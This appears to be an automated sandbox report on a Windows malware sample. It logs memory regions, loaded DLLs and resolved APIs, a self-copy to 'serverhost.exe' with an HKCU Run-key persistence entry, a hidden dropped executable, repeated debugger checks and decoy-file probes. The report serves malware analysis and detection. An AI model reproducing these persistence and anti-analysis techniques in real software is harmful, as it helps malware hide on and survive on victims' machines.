private_0x00000000001c0000 0x001c0000 0x001d1fff Private Memory Readable, Writable True True False
private_0x00000000001e0000 0x001e0000 0x001ecfff Private Memory Readable, Writable, Executable True True False
private_0x00000000001f0000 0x001f0000 0x002effff Private Memory Readable, Writable True True False
private_0x00000000002f0000 0x002f0000 0x003affff Private Memory Readable, Writable True True False
private_0x00000000003b0000 0x003b0000 0x003bcfff Private Memory Readable, Writable True True False
42753.exe 0x00400000 0x00419fff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000420000 0x00420000 0x004e7fff Pagefile Backed Memory Readable True False False
private_0x0000000000560000 0x00560000 0x0056ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000570000 0x00570000 0x00670fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000680000 0x00680000 0x0127ffff Pagefile Backed Memory Readable True False False
private_0x00000000013e0000 0x013e0000 0x013effff Private Memory Readable, Writable True True False
sortdefault.nls 0x013f0000 0x016befff Memory Mapped File Readable False False False
esent.dll 0x5f9f0000 0x5fb92fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
webio.dll 0x719c0000 0x71a0efff Memory Mapped File Readable, Writable, Executable False False False
winhttp.dll 0x71a10000 0x71a67fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Host Behavior
File (2)
Operation Filename Additional Information Success Count
Create C:\email.doc desired_access = GENERIC_READ False 1
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe os_pid = 0xb04, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Module (59)
Operation Module Additional Information Success Count
Load USER32.dll base_address = 0x76890000 True 1
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Load KERNEL32.dll base_address = 0x76590000 True 2
Load ntdll.dll base_address = 0x772a0000 True 1
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Load winhttp.dll base_address = 0x71a10000 True 7
Load urlmon.dll base_address = 0x76f00000 True 7
Load wininet.dll base_address = 0x77040000 True 7
Get Handle c:\users\bgc6u8~1\appdata\local\temp\42753.exe base_address = 0x400000 True 1
Get Filename c:\users\bgc6u8~1\appdata\local\temp\42753.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Get Address c:\windows\system32\user32.dll function = GetMessagePos, address_out = 0x768c6703 True 1
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 True 1
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Get Address c:\windows\system32\kernel32.dll function = VirtualAlloc, address_out = 0x765e2fb6 True 1
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x765d3ea8 True 1
Get Address c:\windows\system32\kernel32.dll function = GetCommandLineA, address_out = 0x765e98ff True 1
Get Address c:\windows\system32\kernel32.dll function = LoadLibraryA, address_out = 0x765e395c True 1
Get Address c:\windows\system32\ntdll.dll function = cos, address_out = 0x772e7400 True 1
Get Address c:\windows\system32\ntdll.dll function = sin, address_out = 0x772d41c0 True 1
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
System (3)
Operation Additional Information Success Count
Get Computer Name result_out = F71GWAT True 1
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Get Info type = Windows Directory, result_out = C:\Windows True 1
Mutex (1)
Operation Additional Information Success Count
Create mutex_name = MA991ED3B True 1
Debug (499)
Operation Process Additional Information Success Count
Check for Presence c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe True 499
Process #6: serverhost.exe
(Host: 609, Network: 11)
Information Value
ID #6
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:56, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:29
OS Process Information
Information Value
PID 0xb04
Parent PID 0xaf8 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xB08, 0xB0C, 0xB10, 0xB14, 0xB1C, 0xB20, 0xB24, 0xB2C, 0xB34, 0xB38, 0xB3C
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
locale.nls 0x00140000 0x001a6fff Memory Mapped File Readable False False False
private_0x00000000001b0000 0x001b0000 0x0026ffff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x00270fff Private Memory Readable, Writable True True False
private_0x0000000000280000 0x00280000 0x00291fff Private Memory Readable, Writable True True False
private_0x00000000002a0000 0x002a0000 0x002acfff Private Memory Readable, Writable, Executable True True False
private_0x00000000002b0000 0x002b0000 0x002bcfff Private Memory Readable, Writable True True False
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000002d0000 0x002d0000 0x002dffff Private Memory Readable, Writable True True False
pagefile_0x00000000002e0000 0x002e0000 0x003a7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003b0000 0x003b0000 0x003c8fff Pagefile Backed Memory Readable True False False
rsaenh.dll 0x003b0000 0x003ebfff Memory Mapped File Readable False False False
private_0x00000000003b0000 0x003b0000 0x003bffff Private Memory Readable, Writable True True False
pagefile_0x00000000003b0000 0x003b0000 0x003b7fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000003b0000 0x003b0000 0x003b1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003c0000 0x003c0000 0x003c7fff Pagefile Backed Memory Readable, Writable True False False
windowsshell.manifest 0x003c0000 0x003c0fff Memory Mapped File Readable False False False
index.dat 0x003c0000 0x003cffff Memory Mapped File Readable, Writable True False False
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable True False False
index.dat 0x003e0000 0x003e7fff Memory Mapped File Readable, Writable True False False
index.dat 0x003f0000 0x003fffff Memory Mapped File Readable, Writable True False False
42753.exe 0x00400000 0x00419fff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000420000 0x00420000 0x00520fff Pagefile Backed Memory Readable True False False
private_0x0000000000530000 0x00530000 0x0059ffff Private Memory Readable, Writable True True False
private_0x0000000000530000 0x00530000 0x00530fff Private Memory Readable, Writable True True False
pagefile_0x0000000000530000 0x00530000 0x00530fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000540000 0x00540000 0x00540fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000550000 0x00550000 0x00550fff Pagefile Backed Memory Readable True False False
private_0x0000000000560000 0x00560000 0x0059ffff Private Memory Readable, Writable True True False
private_0x00000000005b0000 0x005b0000 0x005bffff Private Memory Readable, Writable True True False
private_0x00000000005f0000 0x005f0000 0x006effff Private Memory Readable, Writable True True False
pagefile_0x00000000006f0000 0x006f0000 0x012effff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x012f0000 0x015befff Memory Mapped File Readable False False False
private_0x00000000015c0000 0x015c0000 0x016bffff Private Memory Readable, Writable True True False
private_0x00000000016c0000 0x016c0000 0x017bffff Private Memory Readable, Writable True True False
private_0x00000000017c0000 0x017c0000 0x018bffff Private Memory Readable, Writable True True False
private_0x00000000018c0000 0x018c0000 0x019bffff Private Memory Readable, Writable True True False
private_0x00000000019c0000 0x019c0000 0x01a6ffff Private Memory Readable, Writable True True False
private_0x0000000001a70000 0x01a70000 0x01b6ffff Private Memory Readable, Writable True True False
private_0x0000000001b70000 0x01b70000 0x01d4ffff Private Memory Readable, Writable True True False
private_0x0000000001b70000 0x01b70000 0x01beffff Private Memory Readable, Writable True True False
private_0x0000000001bf0000 0x01bf0000 0x01ceffff Private Memory Readable, Writable True True False
private_0x0000000001d40000 0x01d40000 0x01d4ffff Private Memory Readable, Writable True True False
private_0x0000000001d50000 0x01d50000 0x01f4ffff Private Memory Readable, Writable True True False
private_0x0000000001d50000 0x01d50000 0x01e4ffff Private Memory Readable, Writable True True False
private_0x0000000001f40000 0x01f40000 0x01f7ffff Private Memory Readable, Writable True True False
private_0x0000000001f80000 0x01f80000 0x0207ffff Private Memory Readable, Writable True True False
private_0x0000000002080000 0x02080000 0x0217ffff Private Memory Readable, Writable True True False
private_0x0000000002180000 0x02180000 0x0227ffff Private Memory Readable, Writable True True False
private_0x0000000002280000 0x02280000 0x0237ffff Private Memory Readable, Writable True True False
esent.dll 0x5f9f0000 0x5fb92fff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x6e660000 0x6e667fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x6f800000 0x6f805fff Memory Mapped File Readable, Writable, Executable False False False
netprofm.dll 0x6f880000 0x6f8d9fff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
webio.dll 0x719c0000 0x71a0efff Memory Mapped File Readable, Writable, Executable False False False
winhttp.dll 0x71a10000 0x71a67fff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x72050000 0x72055fff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x72be0000 0x72bf4fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x72c00000 0x72c51fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x733b0000 0x733bcfff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x735a0000 0x735a7fff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x735b0000 0x735c1fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x735d0000 0x735dffff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc.dll 0x73f80000 0x73f91fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x73fa0000 0x73fd7fff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc6.dll 0x73ff0000 0x73ffcfff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x740e0000 0x740e6fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x740f0000 0x7410bfff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74180000 0x7418cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x747f0000 0x747fffff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x749d0000 0x749d4fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74af0000 0x74b06fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74c20000 0x74c5afff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x74d00000 0x74d43fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74e30000 0x74e6bfff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x75270000 0x75275fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x753e0000 0x753edfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x75890000 0x75892fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x76960000 0x76994fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x773e0000 0x773e5fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory Readable, Writable True True False
private_0x000000007ffd5000 0x7ffd5000 0x7ffd5fff Private Memory Readable, Writable True True False
private_0x000000007ffd6000 0x7ffd6000 0x7ffd6fff Private Memory Readable, Writable True True False
private_0x000000007ffd7000 0x7ffd7000 0x7ffd7fff Private Memory Readable, Writable True True False
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory Readable, Writable True True False
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory Readable, Writable True True False
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory Readable, Writable True True False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True True False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe 92.00 KB (94208 bytes) MD5: 2b8584cab96d20ee851054f9fedef7f3 SHA1: de72320cc8fc12f2e410afa07809b620f81066dc SHA256: f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1 False
Modified Files
Filename File Size Hash Values YARA Match Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 64.00 KB (65536 bytes) MD5: e56a6538abf1d60544ce14111c423323 SHA1: f57cc7b3be0d2cf0b65d0397e76c73717bd1a96b SHA256: 0341e7374090ca82b3ff7c1a6cbfd85ebc48be5ec3135aaf183c0c0c7da993da False
c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB (32768 bytes) MD5: e8289ca60a86329fef2726ababd2b99a SHA1: a2567af5c9e4f7f9e9e08f5f8aec657a41692d4d SHA256: 33900323a9a4bdde6a22ee56a613f0dd67f275d3571321cdac54ea7321e244de False
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB (65536 bytes) MD5: 4d32b3456316311c50d77f7a37556236 SHA1: 47f9117eb7cf12bd3c36295b8084e98d962b6861 SHA256: 4ff606ec32478199d9183c9ec73ed4d0787f52ecc6504b7ce2d5cdf3ded0a5a6 False
Host Behavior
File (6)
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe type = size True 1
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe size = 94208 True 1
Registry (2)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run True 1
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ True 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe os_pid = 0xbdc, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Module (71)
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76890000 True 1
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Load KERNEL32.dll base_address = 0x76590000 True 2
Load ntdll.dll base_address = 0x772a0000 True 1
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Load winhttp.dll base_address = 0x71a10000 True 7
Load urlmon.dll base_address = 0x76f00000 True 8
Load wininet.dll base_address = 0x77040000 True 8
Load advapi32.dll base_address = 0x764f0000 True 1
Load ole32.dll base_address = 0x77140000 True 1
Load shell32.dll base_address = 0x758a0000 True 1
Load crypt32.dll base_address = 0x755b0000 True 1
Load userenv.dll base_address = 0x74af0000 True 1
Load wtsapi32.dll base_address = 0x74180000 True 1
Get Handle c:\users\bgc6u8~1\appdata\local\temp\42753.exe base_address = 0x400000 True 1
Get Filename c:\users\bgc6u8~1\appdata\local\temp\42753.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 3
Get Address c:\windows\system32\user32.dll function = GetMessagePos, address_out = 0x768c6703 True 1
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 True 1
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Get Address c:\windows\system32\kernel32.dll function = VirtualAlloc, address_out = 0x765e2fb6 True 1
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x765d3ea8 True 1
Get Address c:\windows\system32\kernel32.dll function = GetCommandLineA, address_out = 0x765e98ff True 1
Get Address c:\windows\system32\kernel32.dll function = LoadLibraryA, address_out = 0x765e395c True 1
Get Address c:\windows\system32\ntdll.dll function = cos, address_out = 0x772e7400 True 1
Get Address c:\windows\system32\ntdll.dll function = sin, address_out = 0x772d41c0 True 1
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Create Mapping C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Map C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ True 1
Service (1)
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
System (22)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 2
